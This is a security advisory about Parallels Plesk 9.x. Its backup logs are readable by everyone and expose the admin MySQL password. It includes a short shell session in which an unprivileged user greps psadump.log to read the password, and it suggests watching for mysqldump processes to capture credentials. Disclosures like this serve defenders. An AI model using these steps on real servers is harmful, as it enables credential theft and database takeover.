Parallels PLESK 9.x Insecure Permissions

Type packetstorm
Reporter Nicolas Krassas
Modified 2012-04-26T00:00:00


                                            `# Exploit Title: PLESK 9.x insecure directory permission ( admin password revealed )  
# Date: 25/04/2012  
# Author: Nicolas Krassas ,  
# Software Link: www.*parallels*.com/*plesk*/  
# Version: 9.x  
# Tested on: ubuntu / centos  
During backup procedures, PLESK panel is keeping a detailed log of the  
process under /opt/psa/PMM/sessions in Debian/Ubuntu installations and  
/usr/local/psa/PMM/sessions in Centos under the directory with the current  
date. A detailed log file is created with the name psadump.log, with  
readable permissions for everyone. The file will reveal the admin password  
used from the backup process to dump the mysql databases from the sites  
being backed up.  
It's possible to locate data also under the sessions directory from  
incomplete/crashed backup sessions where the log files are not safely  
removed from the system.  
$ id  
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)  
$ cd /opt/psa/PMM/sessions  
$ ls -Fal  
total 32  
drwxr-xr-x 8 root root 4096 2012-04-25 21:42 ./  
drwxr-xr-x 10 root root 4096 2009-12-03 22:07 ../  
drwxr-xr-x 3 root root 4096 2012-04-25 22:12 2012-04-25-211250.973/  
$ cat 2012-04-25-211250.973/psadump.log | grep admin  
18:52:26 INFO Executing bundle producer: '/usr/bin/mysqldump -h  
'localhost' -u 'admin' -p' PASSOWORD ' -P '3306' --quick --quote-names  
--add-drop-table --default-character-set=utf8 --set-charset 'DB'' in  
Old but I didn't see it listed, another way is to constantly monitor the  
system for the mysqldump process using a simple bash script to get the  
credentials as the process is running in the scheduled plesk backups.